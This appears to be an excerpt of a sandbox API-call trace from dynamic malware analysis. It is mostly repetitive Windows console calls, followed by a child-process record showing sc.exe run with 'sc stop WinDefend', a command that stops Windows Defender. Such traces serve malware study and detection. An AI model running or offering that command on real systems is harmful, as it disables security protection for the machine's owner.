	[0064.611] GetLastError () returned 0xcb
	[0064.614] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57
	[0064.614] GetLastError () returned 0xcb
	[0064.614] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.614] GetLastError () returned 0xcb
	[0064.617] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b
	[0064.617] GetLastError () returned 0xcb
	[0064.617] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.617] GetLastError () returned 0xcb
	[0064.620] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0064.620] GetLastError () returned 0xcb
	[0064.620] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.620] GetLastError () returned 0xcb
	[0064.620] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0064.620] GetLastError () returned 0xcb
	[0064.620] CloseHandle (hObject=0x5f) returned 1
	[0064.620] GetLastError () returned 0xcb
	[0064.623] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0064.623] GetLastError () returned 0xcb
	[0064.623] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.623] GetLastError () returned 0xcb
	[0064.623] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0064.623] GetLastError () returned 0xcb
	[0064.623] CloseHandle (hObject=0x5f) returned 1
	[0064.624] GetLastError () returned 0xcb
	[0064.626] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0064.626] GetLastError () returned 0xcb
	[0064.626] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.626] GetLastError () returned 0xcb
	[0064.626] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2547f0c*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x2547f0c*, lpNumberOfCharsWritten=0x570ecdc*=0x4f) returned 1
	[0064.626] GetLastError () returned 0xcb
	[0064.626] CloseHandle (hObject=0x5f) returned 1
	[0064.627] GetLastError () returned 0xcb
	[0064.629] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0064.629] GetLastError () returned 0xcb
	[0064.629] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.629] GetLastError () returned 0xcb
	[0064.629] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0064.629] GetLastError () returned 0xcb
	[0064.629] CloseHandle (hObject=0x5f) returned 1
	[0064.630] GetLastError () returned 0xcb
	[0064.632] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0064.632] GetLastError () returned 0xcb
	[0064.632] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.633] GetLastError () returned 0xcb
	[0064.633] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0064.633] GetLastError () returned 0xcb
	[0064.633] CloseHandle (hObject=0x5f) returned 1
	[0064.633] GetLastError () returned 0xcb
	[0064.635] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0064.635] GetLastError () returned 0xcb
	[0064.635] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.636] GetLastError () returned 0xcb
	[0064.636] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.636] GetLastError () returned 0xcb
	[0064.636] CloseHandle (hObject=0x5f) returned 1
	[0064.636] GetLastError () returned 0xcb
	[0064.638] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0064.639] GetLastError () returned 0xcb
	[0064.639] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.639] GetLastError () returned 0xcb
	[0064.639] GetConsoleOutputCP () returned 0x1b5
	[0064.639] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.639] GetLastError () returned 0xcb
	[0064.642] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63
	[0064.642] GetLastError () returned 0xcb
	[0064.642] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.642] GetLastError () returned 0xcb
	[0064.645] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67
	[0064.645] GetLastError () returned 0xcb
	[0064.645] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.645] GetLastError () returned 0xcb
	[0064.647] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0064.648] GetLastError () returned 0xcb
	[0064.648] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.648] GetLastError () returned 0xcb
	[0064.648] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0064.648] GetLastError () returned 0xcb
	[0064.648] CloseHandle (hObject=0x6b) returned 1
	[0064.648] GetLastError () returned 0xcb
	[0064.651] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0064.651] GetLastError () returned 0xcb
	[0064.651] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.651] GetLastError () returned 0xcb
	[0064.651] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0064.651] GetLastError () returned 0xcb
	[0064.651] CloseHandle (hObject=0x6b) returned 1
	[0064.651] GetLastError () returned 0xcb
	[0064.654] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0064.654] GetLastError () returned 0xcb
	[0064.654] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.654] GetLastError () returned 0xcb
	[0064.654] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x25483e8*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x25483e8*, lpNumberOfCharsWritten=0x570ecdc*=0x19) returned 1
	[0064.654] GetLastError () returned 0xcb
	[0064.654] CloseHandle (hObject=0x6b) returned 1
	[0064.654] GetLastError () returned 0xcb
	[0064.657] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0064.657] GetLastError () returned 0xcb
	[0064.657] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.657] GetLastError () returned 0xcb
	[0064.657] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0064.657] GetLastError () returned 0xcb
	[0064.657] CloseHandle (hObject=0x6b) returned 1
	[0064.658] GetLastError () returned 0xcb
	[0064.660] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0064.660] GetLastError () returned 0xcb
	[0064.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.660] GetLastError () returned 0xcb
	[0064.660] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0064.660] GetLastError () returned 0xcb
	[0064.661] CloseHandle (hObject=0x6b) returned 1
	[0064.661] GetLastError () returned 0xcb
	[0064.663] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0064.667] GetLastError () returned 0xcb
	[0064.667] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.667] GetLastError () returned 0xcb
	[0064.667] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.667] GetLastError () returned 0xcb
	[0064.667] CloseHandle (hObject=0x6b) returned 1
	[0064.668] GetLastError () returned 0xcb
	[0064.670] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0064.670] GetLastError () returned 0xcb
	[0064.670] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.671] GetLastError () returned 0xcb
	[0064.671] GetConsoleOutputCP () returned 0x1b5
	[0064.671] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.671] GetLastError () returned 0xcb
	[0064.673] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f
	[0064.673] GetLastError () returned 0xcb
	[0064.673] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.673] GetLastError () returned 0xcb
	[0064.676] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73
	[0064.676] GetLastError () returned 0xcb
	[0064.676] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.676] GetLastError () returned 0xcb
	[0064.678] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0064.679] GetLastError () returned 0xcb
	[0064.679] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.679] GetLastError () returned 0xcb
	[0064.679] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0064.679] GetLastError () returned 0xcb
	[0064.679] CloseHandle (hObject=0x77) returned 1
	[0064.679] GetLastError () returned 0xcb
	[0064.681] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0064.689] GetLastError () returned 0xcb
	[0064.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.689] GetLastError () returned 0xcb
	[0064.689] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0064.689] GetLastError () returned 0xcb
	[0064.690] CloseHandle (hObject=0x77) returned 1
	[0064.690] GetLastError () returned 0xcb
	[0064.693] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0064.693] GetLastError () returned 0xcb
	[0064.693] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.693] GetLastError () returned 0xcb
	[0064.693] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2548780*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x2548780*, lpNumberOfCharsWritten=0x570ecdc*=0x36) returned 1
	[0064.693] GetLastError () returned 0xcb
	[0064.693] CloseHandle (hObject=0x77) returned 1
	[0064.694] GetLastError () returned 0xcb
	[0064.696] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0064.696] GetLastError () returned 0xcb
	[0064.696] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.696] GetLastError () returned 0xcb
	[0064.696] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0064.697] GetLastError () returned 0xcb
	[0064.697] CloseHandle (hObject=0x77) returned 1
	[0064.697] GetLastError () returned 0xcb
	[0064.699] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0064.700] GetLastError () returned 0xcb
	[0064.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.700] GetLastError () returned 0xcb
	[0064.700] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0064.700] GetLastError () returned 0xcb
	[0064.700] CloseHandle (hObject=0x77) returned 1
	[0064.700] GetLastError () returned 0xcb
	[0064.702] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0064.703] GetLastError () returned 0xcb
	[0064.703] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.703] GetLastError () returned 0xcb
	[0064.703] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.703] GetLastError () returned 0xcb
	[0064.703] CloseHandle (hObject=0x77) returned 1
	[0064.703] GetLastError () returned 0xcb
	[0064.705] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0064.706] GetLastError () returned 0xcb
	[0064.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.706] GetLastError () returned 0xcb
	[0064.706] GetConsoleOutputCP () returned 0x1b5
	[0064.706] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.706] GetLastError () returned 0xcb
	[0064.708] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b
	[0064.709] GetLastError () returned 0xcb
	[0064.709] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.709] GetLastError () returned 0xcb
	[0064.711] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f
	[0064.711] GetLastError () returned 0xcb
	[0064.711] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.711] GetLastError () returned 0xcb
	[0064.714] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0064.714] GetLastError () returned 0xcb
	[0064.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.714] GetLastError () returned 0xcb
	[0064.714] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0064.714] GetLastError () returned 0xcb
	[0064.714] CloseHandle (hObject=0x83) returned 1
	[0064.715] GetLastError () returned 0xcb
	[0064.717] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0064.717] GetLastError () returned 0xcb
	[0064.717] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.717] GetLastError () returned 0xcb
	[0064.717] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0064.717] GetLastError () returned 0xcb
	[0064.717] CloseHandle (hObject=0x83) returned 1
	[0064.718] GetLastError () returned 0xcb
	[0064.720] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0064.720] GetLastError () returned 0xcb
	[0064.720] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.720] GetLastError () returned 0xcb
	[0064.720] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2548b78*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x2548b78*, lpNumberOfCharsWritten=0x570ecdc*=0x1) returned 1
	[0064.721] GetLastError () returned 0xcb
	[0064.721] CloseHandle (hObject=0x83) returned 1
	[0064.721] GetLastError () returned 0xcb
	[0064.723] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0064.723] GetLastError () returned 0xcb
	[0064.723] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.724] GetLastError () returned 0xcb
	[0064.724] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0064.724] GetLastError () returned 0xcb
	[0064.724] CloseHandle (hObject=0x83) returned 1
	[0064.724] GetLastError () returned 0xcb
	[0064.726] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0064.726] GetLastError () returned 0xcb
	[0064.726] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x570ec8c | out: lpConsoleScreenBufferInfo=0x570ec8c) returned 1
	[0064.727] GetLastError () returned 0xcb
	[0064.727] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0064.727] GetLastError () returned 0xcb
	[0064.727] CloseHandle (hObject=0x83) returned 1
	[0064.727] GetLastError () returned 0xcb
	[0064.729] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0064.729] GetLastError () returned 0xcb
	[0064.729] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x570ed1c | out: lpMode=0x570ed1c) returned 1
	[0064.730] GetLastError () returned 0xcb
	[0064.730] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x1e79938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x570ed1c, lpReserved=0x0 | out: lpBuffer=0x1e79938*, lpNumberOfCharsWritten=0x570ed1c*=0x1) returned 1
	[0064.730] GetLastError () returned 0xcb
	[0064.730] CloseHandle (hObject=0x83) returned 1
	[0064.730] GetLastError () returned 0xcb
	[0064.735] SetEvent (hEvent=0x378) returned 1
	[0064.735] GetLastError () returned 0xcb
	[0064.735] SetEvent (hEvent=0x390) returned 1
	[0064.735] GetLastError () returned 0xcb
	[0064.735] SetEvent (hEvent=0x394) returned 1
	[0064.735] GetLastError () returned 0xcb
	[0064.735] SetEvent (hEvent=0x3b4) returned 1
	[0064.735] GetLastError () returned 0xcb
	[0064.735] SetEvent (hEvent=0x300) returned 1
	[0064.735] GetLastError () returned 0xcb
	[0064.736] SetEvent (hEvent=0x39c) returned 1
	[0064.736] GetLastError () returned 0xcb
	[0064.736] SetEvent (hEvent=0x3a0) returned 1
	[0064.736] GetLastError () returned 0xcb
	[0064.736] SetEvent (hEvent=0x2fc) returned 1
	[0064.736] GetLastError () returned 0xcb
	[0064.736] SetEvent (hEvent=0x3a4) returned 1
	[0064.736] GetLastError () returned 0xcb
	[0064.736] CoUninitialize () 

Thread:
	id = 70
	os_tid = 0x820

	[0064.786] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0064.822] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0064.823] VirtualQuery (in: lpAddress=0x628e260, lpBuffer=0x628f260, dwLength=0x1c | out: lpBuffer=0x628f260*(BaseAddress=0x628e000, AllocationBase=0x5900000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0064.824] VirtualQuery (in: lpAddress=0x628e37c, lpBuffer=0x628f37c, dwLength=0x1c | out: lpBuffer=0x628f37c*(BaseAddress=0x628e000, AllocationBase=0x5900000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0064.827] SetEvent (hEvent=0x370) returned 1
	[0064.827] GetLastError () returned 0x0
	[0064.827] SetEvent (hEvent=0x374) returned 1
	[0064.827] GetLastError () returned 0x0
	[0064.827] SetEvent (hEvent=0x398) returned 1
	[0064.827] GetLastError () returned 0x0
	[0064.827] SetEvent (hEvent=0x370) returned 1
	[0064.827] GetLastError () returned 0x0
	[0064.827] SetEvent (hEvent=0x374) returned 1
	[0064.827] GetLastError () returned 0x0
	[0064.827] SetEvent (hEvent=0x3c8) returned 1
	[0064.827] GetLastError () returned 0x0
	[0064.828] SetEvent (hEvent=0x3bc) returned 1
	[0064.828] GetLastError () returned 0x0
	[0064.828] SetEvent (hEvent=0x3c0) returned 1
	[0064.828] GetLastError () returned 0x0
	[0064.828] SetEvent (hEvent=0x3c4) returned 1
	[0064.828] GetLastError () returned 0x0
	[0064.828] SetEvent (hEvent=0x3cc) returned 1
	[0064.828] GetLastError () returned 0x0
	[0064.828] CoUninitialize () 

Process:
	id = "20"
	image_name = "sc.exe"
	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee177a0"
	os_pid = "0x83c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "17"
	os_parent_pid = "0xfd8"
	cmd_line = "sc  stop WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 58
	os_tid = 0x134

